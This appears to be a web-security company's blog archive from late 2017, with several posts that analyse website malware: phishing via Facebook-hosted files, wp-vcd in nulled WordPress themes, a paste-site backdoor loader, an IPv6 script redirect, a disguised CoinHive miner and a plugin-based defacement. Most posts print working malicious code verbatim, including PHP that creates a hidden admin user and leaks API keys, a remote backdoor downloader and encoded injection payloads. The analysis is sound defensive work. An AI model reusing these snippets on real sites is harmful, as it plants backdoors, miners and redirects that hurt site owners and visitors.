Category: Website Malware Infections

Using Google and Facebook to aid on distribution

Every now and then I check my spam mail box for interesting malware (yes, I receive a lot of phishing messages and alerts that my payments are overdue), but most of the time is more of the same, effortless malware, lousy written messages and not fun to analyze.


Today I was bored (that time of the year that you need to write tons of reports, sorry boss…) and I decided to follow the trail of some of those links on the messages I got. And the first one was a "pleasant" surprise.

Usually I'd go with checking the message origin and writing about how it was sent and what was used to get control of the site, but this time I'll write about other aspect. (If you are wondering, it is a WordPress site with a vulnerable revslider on the site's theme that allowed the attacker to have privileged access to the site).

For those not fluent in Brazilian Portuguese, this message is telling that I have a payment overdue and a new "boleto" (a common barcode payment method in Brazil) is attached. The interesting part is that they are referring to me by my personal email alias and not the full name, however they got my CPF (Brazil's Social Security Number) correct, probably it's is related to some leaked data (not that uncommon here).

Everything on this message is clickable and all them will send you to the same Google shortened URL. Which translates to the Facebook's fbsbx.com domain, which is used by Facebook as the domain where the attachments shared on chats and groups are stored.

It is pretty interesting that they are relying on such services to "host" their files instead of using another hacked site to store the malware. I monitored this file and although the link was set to expire on Fri, 22 Dec 2017 16:15:47 GMT, it was taken down less than 24h after I receive the email scam, probably by a Facebook malware scan process.

Dec 11, 2017 by Fioravante Souza

WP-VCD Malware Comes with Nulled Themes

Recently we wrote about wp-vcd malware that created rogue WordPress admin users (100010010) and injected spam links.

Our readers noticed that the “nulled” premium theme sites promoted by the injected links (and some other similar sites) had this very wp-vcd malware pre-installed with every downloaded theme.

It’s pretty easy to notice when you check the files inside the downloaded .zip files. All original files have one date, but two files have a different, more recent date:


12914 Dec  4 09:25 functions.php33045 Nov 30 09:33 class.theme-modules.php

And if you check those files, you’ll notice that functions.php has this line of code at the top

<?php if (file_exists(dirname(FILE) . '/class.theme-modules.php')) include_once(dirname(FILE) . '/class.theme-modules.php'); ?>

And class.theme-modules.php (the file that is included by the code added in the functions.php) is the file that installs the wp-vcd malware into the theme and creates the rest malicious files.

The beginning of the file looks like this

<?php //install_code1error_reporting(0);ini_set('display_errors', 0);DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']);$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...long base64-encoded string here followed by installation code......

Providing “nulled” content with backdoors, spam and other types of malware is typical for sites that offer premium software “for free”. We warned against using nulled themes and plugins many times.

Cleaning sites with such malware may be not that easy as it downloads and installs more malware as soon as you begin using the contaminated theme or plugin. And the backdoor it creates allows the bad guys to do almost anything with your site. That’s why a thorough site analysis and cleanup is required. Let us know if you need our help.

Dec 6, 2017 by Denis Sinegubko

Backdoor using paste site to host payload

Over the last months, we’ve been talking a lot about new ways to decode complex malwares that involve the usual PHP functions like eval, create_function, preg_replace, assert, base64_decode, etc.


According to our latest reports “Backdoors are found in 72% of infected websites”, although we have hundreds of posts on backdoors and their effects,  today I want to discuss a few techniques that doesn't follow any obfuscation tricks like encrypted strings, concatenations, and typecasting. These unusual backdoors often look like legitimate code and can go unnoticed for most of the malware scanners available in the market.

During an incident response investigation, I detected an interesting backdoor that was small, simple and effective.

The backdoor content was uploaded the wp-content/themes/buildup/db.php file and looked like this:

<?phpif ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {echo "Copy_success";}else{echo "Copy_failed";}?>

This small piece of code downloads the full malware from the hxxps://paste[.].ee  website (if you are not familiar with this site, it's like a Pastebin with SSL and less controls).

The downloaded code was obfuscated with a free tool, which is pretty common for malware developers, but we see good code using it too (note to devs, avoid using those free tools, they may be saving your code).

And here's the more "readable" code:

And, as you may see, we got ourselves a nice copy of FilesMan backdoor being downloaded by a file that may be overlooked by an untrained person.

In order to prevent the website from getting infected, we highly recommend implementing security measures like file integrity monitoring and a website application firewall. It is advisable to constantly monitor your logs for unexpected behavior.

Nov 30, 2017 by Bruno Zanelato

IPv6 address in malicious Javascript redirect

We recently came across a file that shows an interesting case with a Javascript malicious code injection in a website’s custom script file, though it’s not specific to any particular website software:


Infected filename: ./paginas/rodape.php

As this is just a malicious code injection, the filename can be just about anything with a legitimate file extension (i.e .php, .html, .htm, etc) on most web server configurations. The injection was found to just be added to the bottom of the file’s text and was within the normal HTML Javascript tags (<script></script>):

<script src='data:application/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoIiUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCUzYSUyZiUyZiU1YiUzYSUzYSU2NiU2NiU2NiU2NiUzYSUzMSUzMiU2NCU2MyUzYSU2MSUzNyUzMiUzMiU1ZCUyZiUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSIpKTs='>
</script>

This injection may not look that suspicious if not checked carefully as there are legitimate uses of base64 encoded data within Javascript applications, however a quick decoding of the base64 using base64_decode function in PHP, base64 -d command on Linux (Debian based), or the fastest way is to use one of the myriad of online decoder websites. Below is the result of decoding the base64 text from the above malicious code:

document.write(unescape("%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%5b%3a%3a%66%66%66%66%3a%31%32%64%63%3a%61%37%32%32%5d%2f%22%3e%3c%2f%73%63%72%69%70%74%3e"));

The base64 decoded text reveals another layer of text that is de-obfuscated through the unescape function, but it also reveals something that is suspicious: document.write(

 

The Javascript function document.write is often seen in malicious Javascript code injections as causes whatever is within the function’s parentheses to be written to the visitor’s browser page.

 

Now that we know that this code is trying to write something to the visitor’s browser, lets decode the URL encoded text that follows the unescape( text:

<script src="https://[::ffff:12dc:a722]/"></script>

This reveals the true nature of this obfuscated Javascript injection; the code exists to use the document.write function so it can force the visitor’s browser to load an external Javascript file and in this case it just so happens to be hosted on a IPv6 address. The result for the unsuspecting visitor is being redirect to the above IPv6 address which contains a website with Adobe Flash images and instructing the visitor to update their Adobe Flash through a popup dialog box:

If the visitor clicks anywhere on the website page itself then they are automatically redirected, again using Javascript hosted on the IPv6 address, to a hosted file that presumably contains malware. I was unable to confirm the file as it had been taken down at the time of testing, but it is quite easy for the malware distributor to just switch to using a different host for the malicious file that is downloaded to the visitor’s computer.

 

This is interesting because while IPv6 addresses have been in use for some time now, they still aren’t used very often for hosting an entirely malicious website and sending unsuspecting users there through malicious Javascript that is injected into compromised websites. We still primarily see domain names or the more known IPv4 which is what most people consider when they think of an IP address. Now might be a good time to learn a little more about IPv6 just so that you can recognize it and know that it operates similarly to IPv4 in that can be used as a URL.

If you are ever worried that a similar malicious Javascript injection may be on your website, then please try out our completely free, no account required website scanner: SiteCheck.

Nov 29, 2017 by Luke Leal

Fake jQuery and Google Analytics Hide Yet Another...

This is a quick posts about yet another quite massive attack that installs CoinHive JavaScript Monero miners on compromised websites. You might have already read our blog posts on how such attacks were first detected and how they escalated after that.

On Oct 30th, 2017 Microsoft Malware Protection Services tweeted about a new cryptocurrency miner on compromised sites.


The malicious code has a few of interesting features that help obfuscate its true nature:

1. use of a non-dotted decimal notation for the host name: 3104709642(which translates to 185 .14 .28 .10)

  1. quite a common trick of using jQuery name as a script name: hxxp://3104709642/lib/jquery-3.2.1.min.js?v=3.2.11 (the script actually loads the obfuscated version of the CoinHive library)

  2. use of Google Analytics related variable names (google_analytics, googleanalytics) instead of the suspicious miner, to make it look even more legit.

If you remove the layers of obfuscation, it's still a typical CoinHive mining script that uses the NPRak9QU4lFBSneFt23qEIChh5r0SZev site id for the miner.

We decided to search for compromised sites with this script, but it turned out that the screenshot provided by Microsoft was not version of the script injected to websites. It was an already decoded version of the malicious script. The original code looks like this

eval(function(p,​a,c,k,e,r){e=function(c)...skipped...document|google_analytics|function|var|type|text|javascript|5000|addScript|getElementsByTagName|body|appendChild|setTimeout|createElement|stats|11|3104709642|lib|jquery|onload|src|innerHTML|min|new|googleanalytics|Anonymous||NPRak9QU4lFBSneFt23qEIChh5r0SZev|start|http|window|js'​.split('|'),0,{​}))

A quick search on PublicWWW revealed 1833 infected websites (as of Nov 22, 2017). We checked quite a few of them - they were all WordPress sites. Moreover, all the infected sites also shared the "cloudflare.solutions" malware (now it loads a keylogger script) that we wrote about this April.

This is a typical WordPress infection and you can use our guide to clean it or have us do it for you.

Nov 24, 2017 by Denis Sinegubko

New wave of wp-vcd Malware

Recently we saw a new wave of a known malware that injects malicious WordPress admin users to vulnerable or compromised sites.


The malware, well analysed by Manuel D'Orso (here), was being injected on default WordPress themes that are not used by the infected site (twentyfifteen and twentysixteen mostly).

Back when we first detected this wp-vcd variant, it was injecting its code on "wp-includes/class.wp.php", this is an outdated strategy to avoid being detected by the unaware user; since nobody wants to delete WordPress core files and risk the site integrity. However, as security tools become more and more popular, this strategy fails. It's now pretty easy for any tool to detect modifications on core files. And, since theme files are changed constantly, they found a better place to hide it.

The injection, on most of the cases we found, was related to outdated software (plugins or themes). Which a simple update or using a WAF would prevent. Update: This malware is also pre-installed in "nulled" premium themes on certain download sites.

Code is pretty straightforward and doesn't hide its malicious intentions by encoding or obfuscation of functions...

<?phperror_reporting(0);if( !isset($_GET['go']) ){require $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';$table_name = $wpdb->get_blog_prefix();$sample = 'a:1:{s:13:"administrator";b:1;}';if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}if( isset($_GET['awu']) ) {$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`,  `user_status`, `display_name`) VALUES ('100010010', '100010010', '$P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.',   '100010010', 'te@ea.st', '', '2011/06/07 0:00 00:00:00', '', '0', '100010010');");$wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, '100010010', '{$table_name}capabilities', '{$sample}');");$wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '100010010', '{$table_name}user_level', '10');"); }if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE `ID` = 100010010");$wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 100010010");}if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); cho '<center><h2>' . esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key'])) . '<br>';  echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; }  }

It is creating a new admin user named 100010010 which, as admin, can perform several malicious activities on the infected site.

If you found this code on your site and need help checking for any other possible malware, please contact us we'll be glad to help.

Nov 13, 2017 by Krasimir Konov

Attackers leveraging WP Maintenance plugin to deface websites

Recently, during a website investigation, we detected that attackers have been modifying the database structure of WP Maintenance plugin (which is a very popular wordpress plugin which adds a "down for maintenance" or coming soon page for your website) and inserting malicious code into wpmm_settings option to lead users to the harmful content.

The malware would change the plugin's database values to the defacement page like it follows:

The background:

"bg_custom";s:67:"https://www.website.com/wp-content/uploads/2017/07/anonymous.jpg";

And the message :

s:4:"text";
s:538:"<h2 class="pi-item pi-item-spacing pi-title">“When you’re stuck in a foreign country and don’t know the words for “reverse charges”
and you’re in some lonely skin joint in the middle of some poor slum and just had every last cent robbed from you and you call yourself a bodyguard then you know you’re a loser.\"</h2>
<p style="text-align: left"> </p>

Now, in order to "deface" the website, the attacker would only need to enable the maintenance page. No files were rewritten and inexperienced website owners may have some trouble figuring out what happened and how to fix.

It is worth to mention that the plugin is NOT vulnerable, the attackers were leveraging valid plugin functions instead of replacing the index.php file as usual.

The rendered code will result into something like this:

As website owners, we have to make sure our visitors have the best experience possible and won’t be at risk when accessing your website.

If you detected any unusual code or suspect of any unexpected behavior, we are here to help you get your website back on track.

Oct 25, 2017 by Bruno Zanelato